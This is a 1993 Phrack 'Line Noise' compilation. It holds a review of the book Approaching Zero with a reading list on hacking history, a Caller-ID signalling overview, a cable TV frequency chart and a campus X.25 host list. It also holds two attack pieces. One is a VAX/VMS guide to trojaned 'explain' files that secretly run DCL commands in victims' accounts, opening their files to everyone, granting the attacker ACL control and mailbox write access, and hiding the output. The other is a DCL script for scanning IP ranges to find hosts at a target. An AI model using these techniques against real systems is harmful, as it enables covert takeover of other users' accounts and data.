[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]


..[ Phrack Magazine ]..
.:: Line Noise Part II ::.

Issues: [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] [ 24 ] [ 25 ] [ 26 ] [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] [ 33 ] [ 34 ] [ 35 ] [ 36 ] [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] [ 42 ] [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] [ 48 ] [ 49 ] [ 50 ] [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ] [ 57 ] [ 58 ] [ 59 ] [ 60 ] [ 61 ] [ 62 ] [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] [ 68 ]
Current issue : #43 | Release date : 1993-01-07 | Editor : Erik Bloodaxe
IntroductionDatastream Cowboy
Phrack Loopback Part IPhrack Staff
Phrack Loopback Part II / EditorialPhrack Staff
Line Noise Part IPhrack Staff
Line Noise Part IIPhrack Staff
Phrack Pro-Phile on Doctor WhoDoctor Who
Conference News Part Ivarious
Conference News Part IIvarious
How To Hack Blackjack (Part I)Lex Luthor
How To Hack Blackjack (Part II)Lex Luthor
Help for Verifying Novell SecurityPhrack Staff
My Bust (Part I)Robert Clark
My Bust (Part II)Robert Clark
Playing Hide and Seek, Unix StylePhrack Accident
Physical Access and Theft of PBX SystemsCodec
Guide to the 5ESSFirm G.R.A.S.P.
Cellular InfoMadjus
LODCOM BBS Archive Informationunknown
LODCOM Sample Messagesunknown
Step By Step Guide To Stealing a CamaroSpy Ace
Acronyms Part IFirm G.R.A.S.P.
Acronyms Part IIFirm G.R.A.S.P.
Acronyms Part IIIFirm G.R.A.S.P.
Acronyms Part IVFirm G.R.A.S.P.
Acronyms Part VFirm G.R.A.S.P.
International Scenevarious
Phrack World NewsDatastream Cowboy
Title : Line Noise Part II
Author : Phrack Staff
                         ==Phrack Magazine==

              Volume Four, Issue Forty-Two, File 5 of 27


                           //   //  /\   //   ====
                          //   //  //\\ //   ====
                         ==== //  //  \\/   ====

                     /\   //  // \\    //  /===   ====
                    //\\ //  //   //  //   \=\   ====
                   //  \\/    \\ //  //   ===/  ====

                                (cont)

******************************************************************************

    `'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'
    '`                                            '`
    `'             Approaching Reality:           `'
    '`             ~~~~~~~~~~~~~~~~~~~~           '`
    `'  A review of the new book Approaching Zero `'
    '`  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ '`
    `'                by Aleph One                `'
    '`                ~~~~~~~~~~~~                '`
    `'                                            `'
    '`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`

     When I started to read this book, I expected to read one more of the
series of books that claim to be the "definitive history of the computer
underworld" and the "first book to define the technological subculture of
phreaking, hacking, and virus writing".  After all what does a guy that
writes for GQ, The Hollywood Reporter, Variety and Time know about the
computer underground?  Well to my surprise the authors, Paul Mungo and
Bryan Clough (a member of the Virus Strategy Group, which is coordinated by
New Scotland Yard's Computer Crime Unit), did a pretty good job at presenting
the facts as they are.  For the first time I heard a reporter and a
computer crime expert give real figures at how much computer crime has
really cost.  Other than a few minor technical errors and the fact that
they fail to mention some people and groups (especially in the virus
section), the book was enjoyable to read.

    The book covers the history of the underground starting with its
beginnings in the 60's, from phreaking to the adventures of Captain
Crunch and the rest of the bunch to the not so long ago Operation Sundevil
and the raids all over the country on members of the LOD, MOD and DPAC.
It also goes through the events that led to the German hackers spy trials,
and to the new generation of virus writers that are creating the new kind
of living organisms that roam cyberspace.  They also discuss the gray
scale that categorizes hackers, from the good hackers to the bad to the
ones not that bad... those who are in it for profit and those who are
in it to learn.  Hopefully all the readers of the book, hackers, security
specialists, reporters and the general public will get a better
understanding of what motivates hackers to do what they do by learning
where they come from. To the hackers let them learn not to repeat their
past errors.


     I hope that the time of raids and sting operations has passed, but
the late developments in the Washington 2600 meeting have pulled a shadow
over my hopes.  Has no one learned?  Have the SS and FBI nothing better to
do?  Just a few moths back someone pulled one of the greatest scams of all
by setting up a fake ATM and stealing a few thousand dollars.  These are
the kind of people the authorities should be after.  And to the hacker,
don't sell yourself!  Remember this is a learning trip, once you start
forgetting to learn and start making money out of it, it is just another
job, an illegal one at that.

     Approaching Zero was an exciting and interesting surprise.  It has
given me the hint that maybe someone out there understands and I hope that
everyone that reads it (and you must, you must read and learn all you can)
will also understand.  I just leave you with these words:  Hacking comes
from the heart - sometimes in the form of an obsession, sometimes in the
form of a hobby - once that dies, there is nothing left to do.  No more
traveling trough the nets!  No more exploring new systems!  You might as
well turn the power off.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

 What fallows is a list of books, papers and articles for those that
want to know a little more of how the media portrays us, and a little more
about the story of hacking in general.


     Books:
     ~~~~~~

   - "Approaching Zero" by Paul Mungo & Bryan Clough. Random House
   1992.

   - "Beating the System" by Owen Bowcott & Sally Hamilton. London:
    Bloomsbury, 1990.

   - "Computer Viruses - A High-Tech Disease" by Ralf Burger. Grand
    Rapids, MI: Abacus, 1988.

   - "The Hackers' Handbook" by Hugo Cornwall. London: Century
    Communications, 1985.

   - "Computers Under Attack" by Peter Denning. Addison Wesley, 1990.

   - "Profits of Deceit" by Patricia Franklin. London: William
    Heinemann, 1990.

   - "Cyberpunk" by Katie Hafner & John Markoff. London: Fourth Estate,
    1991.

   - "Out of the Inner Circle" by Bill Landreth (aka The Cracker).
    Redmond, WA.: Tempus Books, 1985.

   - "Sillicon Valley Fever" by Judith K. Larsen & Everett M. Rogers.
    London: George Allen & Unwin, 1985.

   - "Computer Viruses" by Ralph Roberts. Greensboro, NC: Compute! Books,
    1988.

   - "The Cuckoo's Egg" by Clifford Stoll. New York: Doubleday, 1989.

   - "Spectacular Computer Crimes" by Buck BloomBecker. Dow Jones-Irwin,
    1990.

   - "The New Hacker's Dictionary" by Eric Raymond. MIT Press, 1983.

   - "The Hacker Crackdown" by Bruce Sterling. Bantam Books, 1992.

   - "The Little Black Book of Computer Viruses" by Mark Ludwig. American
    Eagle Publications, 1991.

   - "Artificial Life" by Steven Levy. Panthenon, 1992. (For those virus
    writers out there, use your tallen to create life.)


     Articles & Papers:
     ~~~~~~~~~~~~~~~~~~

   - "Crime and Puzzlement" by John Perry Barlow. Whole Earth Review,
    Fall 1990: 44-57.

   - "The Casino Virus - Gambling with Your Hard Disk" by Jim Bates.
    Virus Bulletin, March 1991: 15-17.

   - "The TP Viruses" by Vesselin Bontchev. Postings to Virus-L 1990.

   - "In Defense of Hackers" by Craig Bromberg. The New York Times
    Magazine, April 21, 1991.

   - "Bulgaria - The Dark Country" by Bryan Clough. Virus Bulletin,
    December 1990: 9-11.

   - "Voice Mail Computer Abuse Prosecution: United States v. Doucette
    a/k/a Kyrie" by William J. Cook. Safe Computing Proceedings of the
    Fourth Annual Computer Virus & Security Conference, 1991, Organized
    by National Computing Corporation.

   - "Invasion of the Data Snatchers!" by Philip Elmer-De Witt. Time,
    September 26, 1988: 63.

   - "Data Exchange and How to Cope with This Problem: The Implication
    of the German KGB Computer Espionage Affair" by Hans Gliss. Paper
    presented at Securicom Italia, October 1989.

   - "The Implications of the SPANet Hack." Computers Fraud & Security
    Bulletin, Vol. 10, No. 2, 1987.

   - "The Brain Virus: Fact and Fantasy" by Harold J. Highland. Computers
    & Security, August 1988: 367-370.

   - Computer Viruses - A Post Modern." Computer & Security, April 1988:
    117-184.

   - "Terminal Delinquents" by Jack Hitt & Paul Tough. Esquire, December
    1990.

   - "The Social Organization of the Computer Underground" by Gordon R.
    Meyer. M.A. Thesis Submitted to the Graduate School, August 1989.

   - "Satanic Viruses" by Paul Mungo. GQ, February 1991: 126-130.

   - "Secrets of the Little Blue Box" by Ron Rosenbaum. Esquire, October
    1971, Collected in Travels with Dr. Death. New York: Viking Penguin,
    1991.

   - "The Worm Program - Early Experience with a Distributed
    Computations" by John F. Shoch. Communications of the ACM, Vol. 25,
    No. 3, March 1982.

   - "The Search for Den Zuk" by Fridrik Skulason. Virus Bulletin,
    February 1991: 6-7.

   - "Crisis and Aftermath" by Eugene H. Spafford. Communications of the
    ACM. Vol. 32, No. 6, June 1989.

   - "GURPS Labor Lost: The Cyberpunk Bust" by Bruce Sterling, Effector,
    September 1991: 1.

   - "Stalking the Wily Hacker" by Clifford Stoll. Communications of the
    ACM. Vol. 31, No. 5, May 1988.

   - "The Kinetics of Computer Virus Replication." by Peter S. Tippett.
    FundationWare, March 1990.

   - "The General and Logical Theory of Automata" by John L. von Neumann.
    Hixon Symposium, September 1948.

   - "Here Comes the Cyberpunk" by Eden Restored. Time, February 8, 1993:
    58-65.

   - "Surfing Off the Edge" by Richard Begar. Time, February 8, 1993: 62.

   - "Can Hackers Be Sued for Damages Caused by Computer Viruses?" by
    Pamela Samuelson. Communications of the ACM. Vol. 32, No. 6, June
    1989.

   - "Viruses and Criminal Law" by Michael Gemignani. Communications of
    the ACM. Vol. 32, No. 6, June 1989.

   - "Password Cracking: A Game of Wits" by Donn Seeley. Communications
    of the ACM. Vol. 32, No. 6, June 1989.

   - "The Cornell Commission: On Morris and the Worm" by Ted Eisenberg,
    David Gries, Juris Artmanis, Don Holcomb, M. Stuart Lynn & Thomas
    Santoro. Communications of the ACM. Vol. 32, No. 6, June 1989.

   - "Desperately Seeking Cyberspace" by Paul Saffo. Personal Computing,
    May 1989: 247-248.

   - "Secrets of the Software Pirates" by Bylee Gomes. Esquire, January
    1982: 58-64.

   - "Trouble in Cyberspace" by Willard Uncapher. The Humanist,
    September/October 1991: 5-14,34.

   - "Is Computer Hacking a Crime?" Capture of a discussion held on the
    WELL. Harper's Magazine, March 1990: 45-57.

   - "The United States vs. Craig Neidorf" by Dorothy E. Denning.
    Communications of the ACM, Vol. 34, No. 3, March 1991: 24-32.

   - "Colleagues Debate Denning's Comments." Communications of the ACM.
    Vol. 34, No. 3, March 1991: 33-41.

   - "Denning's Rebutal" by Dorothy E. Denning. Communications of the
    ACM. Vol. 34, No. 3, March 1991: 42-43.

   - "Coming into the Country" by John P. Barlow. Communications of the
    ACM. Vol. 34, No. 3, March 1991: 19-21.

   - "Off the Hook" by Julian Dibbell. Village Voice, August 21, 1990: 8.

   - "On Line and Out of Bounds" by Julian Dibbell. Village Voice, July
    24, 1990:27-32.

  - "Hi-Tech Mall Crawl" by Julian Dibbell. Village Voice. March 1990: 12

  - "Samurai Hackers" by Lynda Edwards. Rolling Stone, September 19,
   1991: 67-69.

  - "Crackdown on hackers `may violate civil rights'" by Dan Charles.
   New Scientist, July 21, 1990: 22.

  - "United States v. Zod." The Economist, September 1, 1990: 23.

  - "Drop the Phone." Time, January 9, 1989: 49.

  - "Computer Recreations (Core War)" by A. K. Dewdney. Scientific
   American, May 1984: 14-21.

  - "Computer Recreations (Core War)" by A. K. Dewdney. Scientific
   American, March 1985: 14-23.

  - "Computer Recreations (Core War)" by A. K. Dewdney. Scientific
   American. March 1989: 110-113.

  - "Computer Security: NAS Sounds the Alarm" by Eliot Marshall. Science,
   Vol. 250: 1330.

  - "Students Discover Computer Threat" by Gina Koda. Science, Vol. 215,
   5 March, 1982: 1216-1217.

  - "A nationwide Computer-Fraud Ring Is Broken Up." The New York Times
   National, Sunday, April 19, 1992.

  - "Hackers: Is a Cure Worse than the Disease?" by Mark Lewyn. Business
   Week, December 4, 1989: 37-38.

  - "Computer Hacking Goes to Trail" by William F. Allman. U.S. News &
   World Report, January 22, 1990: 25.

  - "Morris Code: by Katie Hafner. The New Republican, February 19, 1990:
   15-16.

  - "Hackers Intentions Key to Court Case" by David Lindley. Nature. Vol.
   340, August 3, 1989: 329.

  - "Problems of Security" by David Lendley. Nature. Vol. 340. July 27,
   1989: 252.

  - "Hostile Takeovers" by Paul Wallich. Scientific American, January
   1989: 22-23.

  - "The Worm's Aftermath" by Eliot Marshall. Science, Vol. 242, November
   25, 1988: 1121-1122

  - "Researcher Fear Computer Virus' Will Slow Use of National Network"
   by Calvin Sims.  The New York Times, Monday, November 14, 1998: B6.

  - "Networked Computers Hit by Intelligent `Virus'" by Joseph Palca &
   Seth Shulman. Nature, Vol. 336, November 10, 1988: 97.

  - "The Science of Computing: Computer Viruses" by Peter J. Denning.
   American Scientist, Vol. 76, May-June 1988:236-238.

  - "Cyberpunks and the Constitution" by Philip Elmer-Dewitt. Time, April
   8, 1991:81.

  - "Plan to outlaw hacking." Nature, Vol. 341, October 19, 1989: 559.

  - "Computer System Intruder Plucks Passwords and Avoids Detection" by
   John Markoff. The New York Times National, Monday, March 19, 1990.

  - "Networked Computer Security" by S.J. Buchsbaum. Vital Speeches of
   the day. December 15, 1991: 150-155.

  - "Halting Hackers." The Economist. October 28, 1989: 18.

  - "Revenge of the Nerds" by Nocholas Martin. The Washington Monthly,
   January 1989: 21-24.

  - "Greater awareness of security in aftermath of computer worm" by Seth
   Shulman & Joseph Palce. Nature, Vol. 336, November 1988: 301.

  - "Avoiding Virus Hysteria" by Patrick Honan. Personal Computing, May
   1989: 85-92.

*****************************************************************************

             {----------------------------------------------}
             {                                              }
             {       VMS/VAX Explain Files Explained        }
             {                     or                       }
             {      Security Holes in the VAX and DCL       }
             {                                              }
             {            By: The Arctic Knight             }
             {                                              }
             {----------------------------------------------}

     VAX/VMS hacking has declined in popularity over the years due to the
abundance of UNIX machines now available. It has even gotten bad press from
fellow hackers. Included in this file is a security hole the size of , oh,
any of the older IBM mainframes. With a little curiosity, persistence, and
down right stubbornness I came across this rather obvious hole in the system.
However, this hole may be so obvious that it has remained relatively hidden
until now, especially since the decline of DCL users.
     On most VAX systems, there is something called explain files.  These are
usually help files that are made up by the system operators or borrowed from
somewhere to help better explain the way certain features of the system work,
whether they be general VAX commands, or system-specific programs.
     When you are in your account (Presumably, a fake one, as this can be
tracked down if you are foolish) type:

$ explain index

     and you will get a list of all the explain files on your system. Go ahead
and take a look around these just to get a feel of what it looks like.  It
should be a menu driven list of text files to view or programs to run(!!!).
     Most system operators only set this up to show various text files
describing commands like mentioned above. However, DCL .com files can be run
from explain files as well. Now comes the fun. Many systems will also allow
users to set up there own explain file. A really nice way to make it easy for
other users to view text files or run programs that you have set for group or
world access.
     The first thing someone needs to do is make a file called INTRO.LKT which
will contain whatever introduction text that you would like displayed before
your explain file menu is displayed(i.e. you might have a description of
yourself, your duties, or a funny poem, or WHATEVER YOU WANT THAT CAN BE
CONTAINED IN A TEXT FILE!!!!)
     You can use any editor to do this like EDT(a line editor) or TPU(a full
screen editor). You will need to type something along these lines to create the
file:

$set vt=100         !if using a full screen editor like TPU
$edit/tpu intro.lkt

     After you are finished typing in the file, if you used TPU (A much better
choice than EDT), you press <CONTROL-Z> to save the file. Now you must create
a file called INDEX.LKI which will contain the file directories, filenames,
and short descriptions of the files that you want to have displayed. You do
this in the same manner as above, by entering an editor, and creating the file.

$edit/tpu index.lki

     Now, in this file the lines should look like the following:
(File Directory)         (Filename)      (File Description)

Phrack41.txt  A complete copy of Phrack 41 for your enjoyment.
User:[aknight.hack]vms.txt A guide to hacking VMS systems.
Temp$1:[aknight.ftp]ftplist.txt A list of FTP servers in-state.

     Now, to explain these three lines. The first one will look for the program
in your main directory. The second line will look for the program listed after
it on the device called USER and in the HACK directory within the AKNIGHT
directory. The final line will look on the device called TEMP$1 in the FTP
directory within the AKNIGHT directory. Adding DCL programs will be explained
in a minute, but first lets get this up and running.
     Now, that you have typed in the text files you want, and saved this file
you need to set the protection on your main directory and any others that need
accessing like the text files to group and world access. For the above example
one would want to type(assuming you are in your main directory):

$set prot=(g:re,w:re) user:[000000]aknight.dir     !This is my main directory
$set prot=(g:re,w:re) user:[aknight.hack]
$set prot=(g:re,w:re) temp$1:[000000]aknight.dir   !My second storage device
$set prot=(g:re,w:re) temp$1:[aknight.ftp]
$set prot=(g:r,w:r)   phrack41.txt                 !Giving privs to read only
$set prot=(g:r,w:r)   user:[aknight.hack]vms.txt
$set prot=(g:r,w:r)   temp$1:[aknight.ftp]ftplist.txt

     Now, if you type:

$explain aknight              ! (my username in this instance,your normally)

     You should get a print out to screen of your INTRO.LKT file and then a
message along the lines of "Hit <return> to continue". When you hit return a
menu will appear very similar to the normal explain file menu except with your
files listed and their descriptions which were accessed by the computer from
your INDEX.LKI file. It would look like this(or something similar) in the above
example.

   {a print out of my INTRO.LKT file...}

Hit <RETURN> to continue

                             EXPLAIN AKNIGHT
================================================================================
(A) PHRACK41  T-A complete copy of Phrack 41 for your enjoyment.
(B) VMS       T-A guide to hacking VMS systems.
(C) *EXPLAIN/USER AKNIGHT FTPLIST
              T-A list of FTP servers in-state.
(Q) TERMINATE THIS PROGRAM
================================================================================
T = Text Display P = Program to be run
(* = Related Information)
Choose A-C, Q, oe type HELP for assistance.

     Now you have an explain file. Pressing A-C will print those files to
screen with pauses at each page if set up on your system/account to do so. I
typed out number C the way I did, because when it has to access a directory
other than it's main one, it will usually do this. I think there is away around
this, but to be quite honest I haven't bothered figuring it out yet. When you
quit, you will be dropped back off at your main prompt. The reason you need to
set your protections, is because even thought from your account, it may look
like it is working, if you don't set your protections as described above,
NO ONE else will be able to view it!!
     Now, comes the fun part. Putting DCL .COM files into your explain file.
These are put into your index just like any text file. So you could type up a
program to let someone copy the public files you have in your account to their
directory, or something similar. The security flaw comes in here and it is
a big one. Since a user is accessing your explain file from their account, any
file that they run, issues commands in their account. So, one might plant a
line in the middle of the above program that say something like:

$set def sys$login                   !Returns them to their main directory.
$set prot=(g:rwed,w:rwed) *.*;*      !Their files are now read, write, execute,
                                     !and deleteable by anyone, including you.

     Here is another idea. Say you create a text reader in DCL, to allow people
to jump around in the text files you have, skip pages, etc. called TYPE.COM in
your main directory. Anytime you can fool people into thinking that the
computer is taking a little time to think, you can insert some major commands,
i.e. when it is skipping pages, or coping files, which almost takes no time at
all in reality. I STRONGLY suggest starting any program you plan to nest
commands like this into with:

$set noverify

     Which will make sure that the program lines don't get printed to the
screen as they are running. Another important command to know is the following
which will cause the next text output from the VAX to be sent to a NULL device,
so it will essentially be lost and not printed to the screen. So, if one is
accessing someone's mailbox, you don't want a messaging appearing on screen
saying that you have entered VAX/VMS mail or whatever. The command is:

$assign nl:sys$output/user

     If you forget the /user it will send the output to the null device for the
session, instead of just one line.
     Some other things one might do would be to add yourself to someone's
ACL(access control list) by typing:

$set acl/acl=(ident=[aknight],access=control) *.*;*

     Now, this will give you access to all their files just as if you were the
user, however if they bother to ever do a dir/prot command your username will
be printed all over the screen, so one would suggest if you must do this, to
use a fake account. Same with this below command:

$assign nl:sys$output/user
$mail set write aknight

     The second line will give me read and write access to someone's mailbox,
but once again if they bother to check their mailbox protections your username
will be displayed.
     In case, you haven't realized this yet, this all has A LOT of potential,
and what I have mentioned here is just the tip of the iceberg and really mostly
small and even foolish things to do, but the fact comes down to ANYTHING the
user can do in their account, YOU can do in there account if you know the right
commands and have the patience to nest them into a .COM file well enough.
     When you have created the .COM file and added it to the INDEX.LKI file,
then you will need to set the protection of the file like so:

$set prot=(g:e,w:e) type.com                  !Execution only. No read privs.

     You now have it a fully functional explain file that is only held down by
your imagination.

     Remember, malicious actions aren't the sign of a true hacker, so don't
delete a users complete directory just because you want to show of your power.
Most people won't be impressed.  If your a SYSOP, fix this DAMN HOLE!!! And if
your a user well, learn the system quickly, explore, absorb, and discover some
other hole before the above SYSOP patches this one......

  COMMENTS, QUESTIONS, ADDITIONS, ETC can be sent to PHRACK LOOPBACK. ENJOY!!
{______________________________________________________________________________}

*****************************************************************************

                               A Internet Scanner

                                  (War Dialer)

                                       by

                                    MadHatter



Purpose of this program
~~~~~~~~~~~~~~~~~~~~~~~

     Remember those scanner, war dialer programs everyone used to scan areas of
telephone numbers to find unknown hosts?  Well, now your on the net and you're
targeting some certain establishment, and you know which part of the net they
own, but the hell if you know what the actual IP addresses of their hosts are...
Telneting to NIC.DDN.MIL is no help, their records are a year old...  Might as
well have been 10 yrs ago...  So you type every possible IP address in.  Right?
After a while that shit gets tiring...  Well, hell let the computer do it,
that's what its there for.  More speed, no sore fingers, no bitching, and it
runs when you're not there.  Almost perfect.....


Program Details
~~~~~~~~~~~~~~~
     DCL is the language and it runs on Vaxen.  A,B,C,D respectively represent
the starting IP address.  E,F,G,H respectively represent the ending IP address
(ex. If you what to start at 4.1.1.1 and end at 6.1.1.1 then a = 4, B = 1,
etc.,  E = 6, F = 1, etc.)
     The prog creates a data file (FINAL.DAT) that holds all successful
connections.  If you run it in batch, it also creates a .log file.  This by
far takes up most of the memory.  When the program quits, delete it.
This prog is just one big loop.  It finds a good telnet address and then
reIFINGERs there, saving it.


Program Changes
~~~~~~~~~~~~~~~

     If you run it in batch, then you might (probably) have to define where
the IFINGER or FINGER program is.  Make sure it is the one for FINGERing remote
hosts, the commands for it vary.  Why do you have to define it?  Because the
dumb-ass sysop couldn't think of why anyone would want to use it in batch.


Problems
~~~~~~~~

     The IFINGER (FINGER) command might not connect to some hosts from your
system.  Why can you TELNET there but no IFINGER?  It all probably has to do
with the other host (it has tight security, too far away, doesn't support
FINGERing, etc.).


No Solutions (Just one)
~~~~~~~~~~~~~~~~~~~~~~~

     You say if I can TELNET to more places than IFINGERing, why not base the
scanner on the TELNET command?  Two reasons: (1) the security with the TELNET
command requires its output goes to a terminal, never to run in batch; (2) the
TELNET command does not give the character address (at least not on the system I
use).  To have the character address is valuable to me.  The program lists the
IP address, the character address, then whatever finger came up with.
     When running in batch, the program will quit eventually (do to MAX CPU
time or exceeded disk quota).  This can be a pain (especially if its CPU time),
you can always get more memory.  Try changing the file specifics in the prog,
and run many versions of it at once, to get as much cpu time as possible.
For memory, clear your account, or get more of them.  Another problem is when
your program has stopped and you have nothing in FINAL.DAT file.  So where do
you start the batch off again?  All I can say is count the number of failed
connections and add 'em to your previous start address, start at that address.


More Ideas
~~~~~~~~~~

     If you want the net area of an establishment then ftp to NIC.DDN.MIL and
get the hosts listing, or TELNET there and search for the name.
     Some areas of the net do not like to be scanned.  Your sysop will get nasty
calls, and then you will get nasty e-mail if you for instance scan the Army
Information Systems Center.  Or any other government org.  Of course, this
program wouldn't hurt them at all, it would bounce back.  They use firewalls.
But they will bitch anyway.
     After you run this program for awhile, you'll notice the net is really
a big empty place.  Hosts are few and far between (at least address wise).
Are you agoraphobic yet?  What do you do with all this room?


MadHatter


*----------------------------CUT HERE------------------------------------------*
$ A = 0
$ B = 0
$ C = 0
$ D = 0
$ E = 257
$ F = 0
$ G = 0
$ H = 0
$ D = D - 1
$ IFINGER := $VMS$UTIL:[IFINGER]FINGER.EXE;1
$ CREATE FINAL.DAT
$ LOOP1:
$     ON SEVERE_ERROR THEN GOTO SKIP
$     D = D + 1
$     IFINGER @'A'.'B'.'C'.'D'
$     ON SEVERE_ERROR THEN GOTO SKIP
$     ASSIGN TEMPFILE.DAT SYS$OUTPUT
$     WRITE SYS$OUTPUT "["'A'"."'B'"."'C'"."'D'"]"
$     IFINGER @'A'.'B'.'C'.'D'
$     DEASSIGN SYS$OUTPUT
$     APPEND TEMPFILE.DAT FINAL.DAT
$     DELETE TEMPFILE.DAT;*
$ SKIP:
$     IF A .EQ. E THEN IF B .EQ. F THEN IF C .EQ. G THEN IF D .EQ. H THEN EXIT
$     IF D .EQ. 256 THEN GOTO LOOP2
$     IF C .EQ. 256 THEN GOTO LOOP3
$     IF B .EQ. 256 THEN GOTO LOOP4
$     GOTO LOOP1
$ LOOP2:
$      D = 0
$      C = C + 1
$      GOTO LOOP1
$ LOOP3:
$      C = 0
$      B = B + 1
$      GOTO LOOP1
$ LOOP4:
$      B = 0
$      A = A + 1
$      GOTO LOOP1
$ EXIT
*------------------------------------CUT HERE----------------------------------*

*****************************************************************************

       Caller Identification
       by (Loq)ue & Key
       3/20/93


        Caller-Identification (CID), is a relatively new service being
   offered by several carriers.  It is part of a total revamp of the
   telephone network, with the telephone companies trying to get people
   to spend more money on their systems.  CID is just one of the newer
   CLASS services, which will eventually lead into ISDN in all areas.

        Caller-ID allows a receiving party to see the number that is
   calling before they pick up the phone.  It can be used for everything
   from pizza delivery to stopping prank callers.  One scenario
   made possible from CID is one where a salesman dials your number,
   you look on a little box and see that it is someone you don't want
   to talk to, so you promptly pick up the phone, say "Sorry, I don't
   want any *** *** products" and slam down the receiver.  Ah, the
   wonders of modern technology.

        Caller-ID starts by a person making a call.  When the person
   dials a number, the local switch rings the calling number once, and
   then sends a specially encoded packet to the number, after checking
   to see if that caller has access to the Calling Number Delivery
   service.

        The packet can contain any information, but currently it holds
   a data stream that contains flow control, and error checking data.
   The specifications state that several signals can exist, however,
   only the Caller-ID signal is used currently.

 The CID packet begins with a "Channel Seizure Signal".  The
   CSC is 30 bytes of hex 55, binary 01010101, which is equivalent to
   250 milliseconds of a 600 hz square wave.

        The second signal is the "Carrier Signal," which lasts for 150
   milliseconds, and contains all binary 1's. The receiving equipment
   should have been "woken-up" by the previous signal and should now
   be waiting for the important information to come across.

        Next are the "Message Type Word", and the "Message Length Word".
   The MTW contains a Hex $04 for CID applications, with several other
   codes being planned, for example $0A to mean message waiting for
   a pager.  The MLW contains the binary equivalent of the number of
   digits in the calling number.

        The data words come next, in ASCII, with the least significant
   digit first.  It is padded in from with a binary 0, and followed by
   a binary 1.  A checksum word comes after that, which contains the
   twos-complement sum of the MLW and data words.

 The checksum word usually signals the end of the message from
    the CO, however, other messages for equipment to decode can occur
    afterwards.

        Caller-ID can usually be disabled with a 3 digit sequence,
   which can vary from CO to CO.  Several of these have been mentioned
   in the past on Usenet, in comp.dcom.telecom.

        Caller-ID chips are available from many sources, however,
   remember that you must connect these chips through an FCC-approved
   Part-68 Interface.  Several of these interfaces are available,
   however they are fairly expensive for an amateur electronics hacker.

        If you have any more questions on CID, mail me at the above
   address, or post to comp.dcom.telecom.

       Additional Sources from Bellcore:

        Nynex Catalog of Technical Information #NIP-7400
        SPCS Customer Premises Equipment Data Interface #TR-TSY-0030
        CLASS Feature: Calling Number Delivery #FSD-02-1051
        CLASS Feature: Calling Number Blocking #TR-TSY-000391

*****************************************************************************

     THE  "OFFICIAL"  CABLE  TELEVISION  VIDEO  FREQUENCY  SPECTRUM  CHART
               COURTESY  OF:   JOE  (WA1VIA)   &   JIM  (WA1FTA)

CATV CHANNEL        FREQUENCY (MHz)          CATV CHANNEL      FREQUENCY (MHz)
-------------------------------------------------------------------------------
 2      2            55.25                    37     AA         301.25
 3      3            61.25                    38     BB         307.25
 4      4            67.25                    39     CC         313.25
 5      5            77.25                    40     DD         319.25
 6      6            83.25  (85.25 ICC)       41     EE         325.25
---------------------------------------       42     FF         331.25
 7      7           175.25                    43     GG         337.25
 8      8           181.25                    44     HH         343.25
 9      9           187.25                    45     II         349.25
10     10           193.25                    46     JJ         355.25
11     11           199.25                    47     KK         361.25
12     12           205.25                    48     LL         367.25
13     13           211.25                    49     MM         373.25
---------------------------------------       50     NN         379.25
14      A           121.25                    51     OO         385.25
15      B           127.25                    52     PP         391.25
16      C           133.25                    53     QQ         397.25
17      D           139.25                    54     RR         403.25
18      E           145.25                    55     SS         409.25
19      F           151.25                    56     TT         415.25
20      G           157.25                    57     UU         421.25
21      H           163.25                    58     VV         427.25
22      I           169.25                    59     WW         433.25
----------------------------------------      60     W+         439.25
23      J           217.25                    ---------------------------------
24      K           223.25                    61     W+1        445.25
25      L           229.25                    62     W+2        451.25
26      M           235.25                    63     W+3        457.25
27      N           241.25                    64     W+4        463.25
28      O           247.25                    65     W+5        469.25
29      P           253.25                    ---------------------------------
30      Q           259.25                    66     A-1        115.25
31      R           265.25                    67     A-2        109.25
32      S           271.25                    68     A-3        103.25
33      T           277.25                    69     A-4         97.25
34      U           283.25                    70     A-5         91.25
35      V           289.25                    ---------------------------------
36      W           295.25                    01     A-8         73.25
-------------------------------------------------------------------------------
* This chart was created 08/19/89 by:  WA1VIA & WA1FTA.   Some uses include the
isolation of CATV interference to other radio services,  and building of active
& passive filters,  and descramblers.  This does NOT give you the right to view
or decode premium cable channels;  without proper authorization from your local
cable TV company.  Federal and various state laws provide for substantial civil
an criminal penalties for unauthorized use.
-------------------------------------------------------------------------------
******************************************************************************

                          -----------------------------
                             The CSUNet X.25 Network
                              Overview by Belgorath
                          -----------------------------
                              C y b e r   C o r p s

     Calstate University, along with Humboldt State, runs a small X.25 network
interconnecting its campuses. This file will attempt to give an overview of
this network. The hosts on this network are connected via 9600-baud links. The
main PAD on this network is a PCI/01 that allows the user to connect to several
hosts. Among them are:

(At the time of this writing, several of the machines were unreachable. They
 are marked with "No info available")

hum       - Humboldt State University CDC Cyber 180-830 (NOS 2.7.1)
swrl      - A CalState CDC Cyber named "Swirl", running CDCNet. You may use
            CDCNet to connect to the following hosts:
            ATL    (SunOS, eis.calstate.edu), login as:
               access to request an account
               ctp    to access CTP
            CCS    CDC Cyber 960-31 (NOS 2.7.1) - This is Swirl without CDCNet
            COC    CDC Cyber 960-31 (NOS 2.7.1)
            FILLY  VAX 6230 (VMS 5.3)
            ICEP   IBM 4381 (VM)
            OX     IBM 4381 (MVS) (Aptly Named)
mlvl      - University of California's Library Catalog System, named
            "Melvyl".
sb        - Calstate/San Bernardino CDC Cyber 180-830 (NOS 2.5.2)
sd        - San Diego State University CDC Cyber 180-830B (NOS 2.7.1)
